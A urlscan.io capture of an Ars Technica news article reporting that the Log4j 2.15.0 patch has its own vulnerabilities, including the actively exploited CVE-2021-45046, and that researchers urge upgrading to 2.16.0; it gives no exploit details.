arstechnica.com
Open in
urlscan Pro
3.16.58.52
Public Scan
URL:
https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats...
Submission: On November 06 via manual from AU — Scanned from AU
Submission: On November 06 via manual from AU — Scanned from AU
Form analysis 3 forms found in the DOM
GET /search/
<form action="/search/" method="GET" id="search_form">
<input type="hidden" name="ie" value="UTF-8">
<input type="text" name="q" id="hdr_search_input" value="" aria-label="Search..." placeholder="Search...">
</form>POST https://api.bounceexchange.com/capture/submit
<form id="bx-form-1643624-step-1" bx-novalidate="true" method="post" action="https://api.bounceexchange.com/capture/submit" onsubmit="return bouncex.submitCampaignStep(1643624); return false" onreset="bouncex.close_ad(1643624); return false"
aria-labelledby="bx-campaign-ally-title-1643624" class="bx-ally-no-focus"><input type="hidden" name="campaign_id" value="1643624">
<div class="bx-group bx-group-default bx-group-1643624-rQWiaQ5 bx-group-rQWiaQ5" id="bx-group-1643624-rQWiaQ5">
<div class="bx-row bx-row-image bx-row-image-logo bx-row-ICDTsc2 bx-element-1643624-ICDTsc2" id="bx-element-1643624-ICDTsc2"><img src="//assets.bounceexchange.com/assets/uploads/clients/2806/creatives/78dbf26fc8687b650f46e91adf23f5fa.svg"
alt="logo"></div>
</div>
<div class="bx-group bx-group-default bx-group-1643624-9V7DjRk bx-group-9V7DjRk" id="bx-group-1643624-9V7DjRk">
<div class="bx-2-heading wknd-ally-focus" id="bx-group-1643624-9V7DjRk-h2" tabindex="-1" role="heading" aria-level="2">
<div class="bx-row bx-row-text bx-row-text-default bx-row-eLuSF9U bx-element-1643624-eLuSF9U" id="bx-element-1643624-eLuSF9U">
<div>Join Ars Technica and</div>
</div>
<div class="bx-row bx-row-text bx-row-text-headline bx-row-nNHNozp bx-element-1643624-nNHNozp" id="bx-element-1643624-nNHNozp">
<div>Get Our Best Tech Stories</div>
</div>
<div class="bx-row bx-row-text bx-row-text-subheadline bx-row-IMQMdcF bx-element-1643624-IMQMdcF" id="bx-element-1643624-IMQMdcF">
<div>Delivered Straight to your Inbox.</div>
</div>
</div>
</div>
<div class="bx-group bx-group-default bx-group-1643624-7Y4PFWQ bx-group-7Y4PFWQ" id="bx-group-1643624-7Y4PFWQ">
<div class="bx-row bx-row-input bx-row-input-default bx-row-VYWXDZZ bx-element-1643624-VYWXDZZ" id="bx-element-1643624-VYWXDZZ">
<div class="bx-inputwrap"><input class="bx-el bx-input" id="bx-element-1643624-VYWXDZZ-input" type="email" name="email" placeholder="Email address" aria-required="true"></div>
<div class="bx-component bx-component-validation bx-vtext bx-error-1643624-email" id="bx-error-1643624-email">Please enter above</div>
</div>
<div class="bx-row bx-row-submit bx-row-submit-default bx-row-KmYHkpO bx-element-1643624-KmYHkpO" id="bx-element-1643624-KmYHkpO"><button type="submit" class="bx-button" data-click="submit" data-step-delay="0" data-submit-jump="0"
data-submit-force="0">SIGN ME UP</button></div>
</div>
<div class="bx-group bx-group-micro bx-group-1643624-yAl252D bx-group-yAl252D" id="bx-group-1643624-yAl252D">
<div class="bx-row bx-row-text bx-row-text-sosumi bx-row-0aOCKMV bx-element-1643624-0aOCKMV" id="bx-element-1643624-0aOCKMV">
<div>By signing up, you agree to our <a href="https://www.condenast.com/user-agreement" target="_blank" style="text-decoration: underline; display: inline;" data-uri="28a4345931b57774a815319e04449c8b">user agreement</a> (including the
<a href="https://www.condenast.com/user-agreement#section-viii-g" target="_blank" style="text-decoration: underline; display: inline;" data-uri="5ca5457a9a7ae125af83b63e416879bc"> class action waiver and arbitration provisions</a>), our
<a href="https://www.condenast.com/privacy-policy" target="_blank" style="text-decoration: underline; display: inline;" data-uri="191c5473f8963f69bc786fa7e292a94b">privacy policy and cookie statement</a>, and to receive marketing and
account-related emails from Ars Technica. You can unsubscribe at any time.</div>
</div>
</div><input autocomplete="carb-trap" type="input" name="carb-trap" tabindex="-1" aria-hidden="true" class="bx-input bx-carb-trap">
</form>POST https://api.bounceexchange.com/capture/submit
<form id="bx-form-1643624-step-2" bx-novalidate="true" method="post" action="https://api.bounceexchange.com/capture/submit" onsubmit="return bouncex.submitCampaignStep(1643624); return false" onreset="bouncex.close_ad(1643624); return false"
aria-labelledby="bx-campaign-ally-title-1643624" class="bx-ally-no-focus"><input type="hidden" name="campaign_id" value="1643624">
<div class="bx-group bx-group-default bx-group-1643624-VnlQ1Q6 bx-group-VnlQ1Q6" id="bx-group-1643624-VnlQ1Q6">
<div class="bx-row bx-row-image bx-row-image-logo bx-row-wuBSHw3 bx-element-1643624-wuBSHw3" id="bx-element-1643624-wuBSHw3"><img src="//assets.bounceexchange.com/assets/uploads/clients/2806/creatives/78dbf26fc8687b650f46e91adf23f5fa.svg"
alt=""></div>
</div>
<div class="bx-group bx-group-default bx-group-1643624-YytTDny bx-group-YytTDny" id="bx-group-1643624-YytTDny">
<div class="bx-2-heading wknd-ally-focus" id="bx-group-1643624-YytTDny-h2" tabindex="-1" role="heading" aria-level="2">
<div class="bx-row bx-row-text bx-row-text-default bx-row-73sFtao bx-element-1643624-73sFtao" id="bx-element-1643624-73sFtao">
<div>Thanks!</div>
</div>
<div class="bx-row bx-row-text bx-row-text-headline bx-row-YJNA5ZQ bx-element-1643624-YJNA5ZQ" id="bx-element-1643624-YJNA5ZQ">
<div>You Are Successfully Subscribed</div>
</div>
</div>
</div>
</form>Text Content
Skip to main content * Biz & IT * Tech * Science * Policy * Cars * Gaming & Culture * Store * Forums Subscribe Close NAVIGATE * Store * Subscribe * Videos * Features * Reviews * RSS Feeds * Mobile Site * About Ars * Staff Directory * Contact Us * Advertise with Ars * Reprints FILTER BY TOPIC * Biz & IT * Tech * Science * Policy * Cars * Gaming & Culture * Store * Forums SETTINGS Front page layout Grid List Site theme light dark Sign in PATCHING THE PATCH — PATCH FIXING CRITICAL LOG4J 0-DAY HAS ITS OWN VULNERABILITY THAT’S UNDER EXPLOIT IF YOU'VE PATCHED USING LOG4J 2.15.0, IT'S TIME TO CONSIDER UPDATING AGAIN. STAT. Dan Goodin - 12/16/2021, 5:40 AM Enlarge Wikimedia Commons/Alex E. Proimos READER COMMENTS 157 with Last Thursday, the world learned of an in-the-wild exploitation of a critical code-execution zero-day in Log4J, a logging utility used by just about every cloud service and enterprise network on the planet. Open source developers quickly released an update that patched the flaw and urged all users to install it immediately. Enter your email to get the Ars Technica newsletter close dialog Join Ars Technica and Get Our Best Tech Stories Delivered Straight to your Inbox. Please enter above SIGN ME UP By signing up, you agree to our user agreement (including the class action waiver and arbitration provisions), our privacy policy and cookie statement, and to receive marketing and account-related emails from Ars Technica. You can unsubscribe at any time. Thanks! You Are Successfully Subscribed close dialog FURTHER READING Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update. The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046. The earlier fix, researchers said on late Tuesday, “was incomplete in certain non-default configurations” and made it possible for attackers to perform denial-of-service attacks, which typically make it easy to take vulnerable services completely offline until victims reboot their servers or take other actions. Version 2.16.0 "fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default," according to the above-linked vulnerability notice. Advertisement On Wednesday, researchers at security firm Praetorian said there’s an even more serious vulnerability in 2.15.0—an information disclosure flaw that can be used to download data from affected servers. “In our research, we have demonstrated that 2.15.0 can still allow for exfiltration of sensitive data in certain circumstances,” Praetorian researcher Nathan Sportsman wrote. “We have passed technical details of the issue to the Apache Foundation, but in the interim, we strongly recommend that customers upgrade to 2.16.0 as quickly as possible.” The researchers released the following video that shows their proof-of-concept exploit in action: Log4j 2.15.0 still allows for exfiltration of sensitive data. Researchers for content delivery network Cloudflare, meanwhile, said on Wednesday that CVE-2021-45046 is now under active exploitation. The company urged people to update to version 2.16.0 as soon as possible. The Cloudflare post didn’t say if attackers are using the vulnerability only to perform DoS attacks or if they are also exploiting it to steal data. Researchers from Cloudflare weren’t immediately available to clarify. Praetorian researchers also weren’t immediately available to say if they’re aware of in-the-wild attacks exploiting the data-exfiltration flaw. They also didn’t provide additional details about the vulnerability because they didn’t want to provide information that would make it easier for hackers to exploit it. PROMOTED COMMENTS * Marlor_AU Ars Tribunus Angusticlavius et Subscriptor jump to post Given that most people using Log4J don't use any of the fancy features that are causing vulnerabilities, I think there's a real case for a simple, well-audited drop-in replacement that just implements the core API methods for lightweight users. Most users probably just set up a basic logger with simple properties, instantiate it in their classes, and just log plain messages using "log.info", log.debug", etc. A "LightLog4J" implementation would act as a drop-in replacement for many users, and would probably only require minor revisions for many others. It could even just be a wrapper around another well-proven, lightweight logging library. 6234 posts | registered 10/4/2003 READER COMMENTS 157 with Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Advertisement CHANNEL ARS TECHNICA UNSOLVED MYSTERIES OF QUANTUM LEAP WITH DONALD P. BELLISARIO Today "Quantum Leap" series creator Donald P. Bellisario joins Ars Technica to answer once and for all the lingering questions we have about his enduringly popular show. Was Dr. Sam Beckett really leaping between all those time periods and people or did he simply imagine it all? What do people in the waiting room do while Sam is in their bodies? What happens to Sam's loyal ally Al? 30 years following the series finale, answers to these mysteries and more await. * UNSOLVED MYSTERIES OF QUANTUM LEAP WITH DONALD P. BELLISARIO * UNSOLVED MYSTERIES OF WARHAMMER 40K WITH AUTHOR DAN ABNETT * SITREP: F-16 REPLACEMENT SEARCH A SIGNAL OF F-35 FAIL? * SITREP: BOEING 707 * STEVE BURKE OF GAMERSNEXUS REACTS TO THEIR TOP 1000 COMMENTS ON YOUTUBE * MODERN VINTAGE GAMER REACTS TO HIS TOP 1000 COMMENTS ON YOUTUBE * HOW THE NES CONQUERED A SKEPTICAL AMERICA IN 1985 * SCOTT MANLEY REACTS TO HIS TOP 1000 YOUTUBE COMMENTS * HOW HORROR WORKS IN AMNESIA: REBIRTH, SOMA AND AMNESIA: THE DARK DESCENT * LGR'S CLINT BASINGER REACTS TO HIS TOP 1000 YOUTUBE COMMENTS * THE F-35'S NEXT TECH UPGRADE * HOW ONE GAMEPLAY DECISION CHANGED DIABLO FOREVER * UNSOLVED MORTAL KOMBAT MYSTERIES WITH DOMINIC CIANCIOLO FROM NETHERREALM STUDIOS * US NAVY GETS AN ITALIAN ACCENT * HOW AMAZON’S “UNDONE” ANIMATES DREAMS WITH ROTOSCOPING AND OIL PAINTS * FIGHTER PILOT BREAKS DOWN EVERY BUTTON IN AN F-15 COCKPIT * HOW NBA JAM BECAME A BILLION-DOLLAR SLAM DUNK * LINUS "TECH TIPS" SEBASTIAN REACTS TO HIS TOP 1000 YOUTUBE COMMENTS * HOW ALAN WAKE WAS REBUILT 3 YEARS INTO DEVELOPMENT * HOW PRINCE OF PERSIA DEFEATED APPLE II'S MEMORY LIMITATIONS * HOW CRASH BANDICOOT HACKED THE ORIGINAL PLAYSTATION * MYST: THE CHALLENGES OF CD-ROM | WAR STORIES * MARKIPLIER REACTS TO HIS TOP 1000 YOUTUBE COMMENTS * HOW MIND CONTROL SAVED ODDWORLD: ABE'S ODDYSEE * BIOWARE ANSWERS UNSOLVED MYSTERIES OF THE MASS EFFECT UNIVERSE * CIVILIZATION: IT'S GOOD TO TAKE TURNS | WAR STORIES * SITREP: DOD RESETS BALLISTIC MISSILE INTERCEPTOR PROGRAM * WARFRAME'S REBECCA FORD REVIEWS YOUR CHARACTERS * SUBNAUTICA: A WORLD WITHOUT GUNS | WAR STORIES * HOW SLAY THE SPIRE’S ORIGINAL INTERFACE ALMOST KILLED THE GAME | WAR STORIES * AMNESIA: THE DARK DESCENT - THE HORROR FACADE | WAR STORIES * COMMAND & CONQUER: TIBERIAN SUN | WAR STORIES * BLADE RUNNER: SKINJOBS, VOXELS, AND FUTURE NOIR | WAR STORIES * DEAD SPACE: THE DRAG TENTACLE | WAR STORIES * TEACH THE CONTROVERSY: FLAT EARTHERS * DELTA V: THE BURGEONING WORLD OF SMALL ROCKETS, PAUL ALLEN'S HUGE PLANE, AND SPACEX GETS A CRUCIAL GREEN-LIGHT * CHRIS HADFIELD EXPLAINS HIS 'SPACE ODDITY' VIDEO * THE GREATEST LEAP, EPISODE 1: RISK * ULTIMA ONLINE: THE VIRTUAL ECOLOGY | WAR STORIES More videos ← Previous story Next story → RELATED STORIES by Taboolaby Taboola Sponsored LinksSponsored Links Promoted LinksPromoted Links Camper Vans These Killer New Campers Are Close To PerfectionCamper Vans Undo Flame LaSauce | Youtube How Can IFlame LaSauce | Youtube Undo Best Tech Trend Here Are 23 Of The Coolest Gifts For 2023Best Tech TrendLearn More Undo Health Insight Journal This New Device Is Leaving Neuropаthy Experts BаffledHealth Insight JournalLearn More Undo Dotmalls This Revolutionary Drill Bit Is Talking Arizona By Storm In 2023!DotmallsLearn More Undo Hyundai Santa Fe Killer New Hyundai Is Perfect For Seniors (Take A Peek At Prices)Hyundai Santa Fe Undo TODAY ON ARS * Store * Subscribe * About Us * RSS Feeds * View Mobile Site * Contact Us * Staff * Advertise with us * Reprints NEWSLETTER SIGNUP Join the Ars Orbital Transmission mailing list to get weekly updates delivered to your inbox. Sign me up → CNMN Collection WIRED Media Group © 2023 Condé Nast. All rights reserved. Use of and/or registration on any portion of this site constitutes acceptance of our User Agreement (updated 1/1/20) and Privacy Policy and Cookie Statement (updated 1/1/20) and Ars Technica Addendum (effective 8/21/2018). Ars may earn compensation on sales from links on this site. Read our affiliate link policy. Your California Privacy Rights | Cookies Settings The material on this site may not be reproduced, distributed, transmitted, cached or otherwise used, except with the prior written permission of Condé Nast. Ad Choices